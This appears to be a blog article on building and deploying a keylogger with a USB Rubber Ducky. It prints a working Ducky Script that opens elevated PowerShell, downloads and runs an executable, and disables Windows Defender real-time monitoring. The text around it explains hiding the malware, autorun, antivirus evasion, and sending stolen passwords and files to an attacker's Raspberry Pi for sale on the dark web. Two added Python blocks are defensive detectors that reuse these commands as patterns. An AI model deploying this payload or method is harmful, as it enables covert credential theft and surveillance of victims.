Keyloggers: complete detailed article
A keylogger is a tool designed to record every keystroke on a system for later retrieval. Its purpose is usually to let the user of the tool gain access to confidential information typed by the target on the affected computer, such as user passwords and other private information. Hackers often use virus-, trojan- and rootkit-like methods to remain active and hidden.
The amount of information a keylogger can collect varies with the software used and how complex it is. The most basic programs only collect what the target types and send it out via email or an application. More sophisticated keylogger software can collect:
- Typed information
- GPS location
- IP location
- Saved data
- FTP and SSH transfer service
- Downloads and uploads of data
Contents
- Program a keylogger in Python
- Injecting the script
- Setting up the autorun feature
- Selecting the information retrieval method
- Tools and things required to execute the attack
- Risk
- Preventions
- Courses on Udemy
Program a keylogger in Python
You may need Python and C++, and even some Arduino and Ducky scripting engines, to write and run the code for the keyloggers.
A Python keylogger needs Python to be preinstalled on the victim's system, or you may convert it into a binary so it can be installed on the system anyway. I am going to explain the dynamics but not how to code the entire thing, as even I don't know how to do it (don't judge me). I am going to suggest a few Udemy courses for that; you can check them out if you want to learn how to build a keylogger.
Injecting the script
If you have written the script, converted it to a binary file and uploaded it to MediaFire, you can download it via code running in the background using a Ducky Script. You can have the code and the script in one single Ducky Script that runs in the background of the system, for instance by coding it so that it uses the os functions to run the tool in the background.
Using this you can even make your operation stealthier by placing the programs in a hidden location and hiding the folder using the hide function or header.
The script below downloads and executes a file from a website and disables Defender using PowerShell:
REM Windows 10: PowerShell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start of script
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 200
REM my best attempt at an elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
STRING $down = New-Object System.Net.WebClient; $url = 'abc.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file);
DELAY 1000
GUI r
DELAY 200
REM my best attempt at an elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
STRING exit
ENTER
exit;
The above image shows the complete map of how the HID attack works in detail.
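As an added example, not part of the original post: a defender-side check that scans PowerShell Script Block Logging records (Event ID 4104) for the Defender-tampering and download-and-execute commands the script above types. The record layout, the sample records and the indicator names are constructed for this example.

```python
import re

# Indicator name -> regex over the logged script block text (case-insensitive).
INDICATORS = {
    "defender_realtime_disabled": re.compile(
        r"Set-MpPreference\b[^\n;]*-DisableRealtimeMonitoring\s+\$true", re.I),
    "webclient_download": re.compile(
        r"New-Object\s+System\.Net\.WebClient[^\n]*\.DownloadFile\(", re.I),
    "shell_application_exec": re.compile(
        r"New-Object\s+-com(?:object)?\s+shell\.application[^\n]*\.shellexecute\(", re.I),
    "elevation_prompt": re.compile(
        r"Start-Process\s+powershell\s+-Verb\s+runAs", re.I),
}

def indicators_in(script_block: str) -> list[str]:
    """Return the names of all indicators present in one script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_block)]

def is_alert(found: list[str]) -> bool:
    """Alert on Defender tampering alone, or on a download chained with execution."""
    return ("defender_realtime_disabled" in found
            or {"webclient_download", "shell_application_exec"} <= set(found))

def scan(records: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (record id, indicators) for every 4104 record that should alert."""
    hits = []
    for rec in records:
        if rec.get("event_id") != 4104:  # only PowerShell script block events
            continue
        found = indicators_in(rec["script_block"])
        if is_alert(found):
            hits.append((rec["id"], found))
    return hits

# Constructed sample records (not real telemetry): r1 and r4 are benign admin activity.
SAMPLE_RECORDS = [
    {"id": "r1", "event_id": 4104, "script_block": "Get-MpPreference | Select-Object DisableRealtimeMonitoring"},
    {"id": "r2", "event_id": 4104, "script_block": "$down = New-Object System.Net.WebClient; $url = 'abc.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file);"},
    {"id": "r3", "event_id": 4104, "script_block": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": "r4", "event_id": 4104, "script_block": "Set-MpPreference -DisableRealtimeMonitoring $false"},
]

if __name__ == "__main__":
    for rec_id, found in scan(SAMPLE_RECORDS):
        print(rec_id, found)
```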
Setting up the autorun feature
Using this code you can add an autorun feature for a file. There are software tools out there which automate the process, but for the best result you can opt for injecting the code inside another program which you know the target often uses. This can be achieved by adding a new icon on the desktop that replaces the already existing icon, or you can put the autorun feature in the source code as well. You can even make the files stealthier by converting them to binaries and changing their name from the source code only; like this you can hide them from the task manager and other users. And if you are smart enough you can code it in such a way that the antivirus software does not recognise it as a virus but as a legit application.
Setting the information retrieval method
You can select the retrieval method and the way you want to extract the data from the target. One of the few options is using SSH and FTP. I think SSH is the best, because the name alone suggests a secured shell, and it is recommended to keep yourself safe to a certain extent from reverse engineering of the application. But you can also use FTP to just transfer the files and folders to a Raspberry Pi set up to listen and capture the incoming data. This type of keylogger is really dangerous, as your data can be transferred in just 1 or 2 hours if the attacker has a good internet connection.
You can imagine it like this:
(target's view)
- I have found a pen drive lying around
- I connect it to a PC
- The PC restarts
- I find an app on the pen drive and run it
- Nothing happens
- I remove the pen drive
(hacker's view)
- I receive a connection
- I download the files I intended to
- I install all the malicious files onto the target's computer
- I sell the files and info on the dark web
Data I can retrieve:
- Login information
- Web data
- Stored passwords
- Wi-Fi passwords
- System logs
- Web camera clips
- Photos
- Videos
- Downloads list
- Documents
- And many more...
Tools and things required to execute the attack
- Rubber Ducky: Imagine plugging a seemingly innocent USB drive into a computer and installing backdoors, exfiltrating documents, or capturing credentials. The USB Rubber Ducky injects keystrokes at superhuman speeds, violating the inherent trust computers have in humans by posing as a keyboard.
- Internet: If you never connect your computer, you are 100 percent safe from hackers on the internet. There is no way someone can hack and retrieve, alter or monitor information without physical access. This, however, is not the only way unconnected computers or smartphones can be accessed or monitored.
- Raspberry Pi 4: The Raspberry Pi 4 can do a surprising amount. Amateur tech enthusiasts use Pi boards as media centres, file servers, retro game consoles, routers, and network-level ad-blockers, for starters.
- Python and C++ scripting engine: you can use any editor, from Notepad to Visual Studio, for the job.
- Ducky and Arduino scripting engine: you can write Ducky Scripts in any editor, but Arduino uses the Arduino engine to write Arduino scripts.
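Added example, not from the original post: a timing heuristic a defender can run over keystroke timestamps (as a keyboard filter driver or input hook might record them) to flag bursts faster than a human can type, which is exactly the trait the Rubber Ducky item above describes. The thresholds, the event layout and the sample events are constructed assumptions.

```python
# Events are (offset_ms, key) pairs in arrival order.

def fast_runs(events, max_gap_ms=25, min_run=12):
    """Return (start_idx, end_idx, chars) for every run of at least `min_run`
    consecutive keys whose inter-key gap never exceeds `max_gap_ms`.
    Scripted injection sustains gaps of a few ms for whole command lines,
    while human typists rarely sustain gaps under ~50 ms; both thresholds
    are assumptions to be tuned against local telemetry."""
    runs = []
    start = 0
    for i in range(1, len(events) + 1):
        gap_ok = i < len(events) and events[i][0] - events[i - 1][0] <= max_gap_ms
        if not gap_ok:  # run ends here (slow gap, or end of the event list)
            if i - start >= min_run:
                runs.append((start, i - 1, "".join(k for _, k in events[start:i])))
            start = i
    return runs

def build_events(text, start_ms, gap_ms):
    """Constructed helper: produce events for `text` typed at a fixed key gap."""
    return [(start_ms + n * gap_ms, ch) for n, ch in enumerate(text)]

# Constructed sample: a human typing at ~180 ms/key, then an injected burst at 5 ms/key.
HUMAN = build_events("hello world", 0, 180)
INJECTED = build_events("powershell Start-Process powershell -Verb runAs", 5000, 5)
SAMPLE = HUMAN + INJECTED

if __name__ == "__main__":
    for s, e, chars in fast_runs(SAMPLE):
        print(f"injection-like burst at events {s}-{e}: {chars!r}")
```

Short fast sequences (a quick two-key shortcut, for example) stay under `min_run` and are not flagged, which keeps the heuristic quiet on ordinary typing.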
Note
Hacking is a risky job and you may end up behind bars for doing things such as hacking IT services. Please do it responsibly by taking permission from the target before doing such a thing.
Follow me
Follow my Twitter account for the latest updates.
- Twitter: morpheuslord2
- Instagram: morpheuslord_9034
- Email: morpheuslord@protonmail.com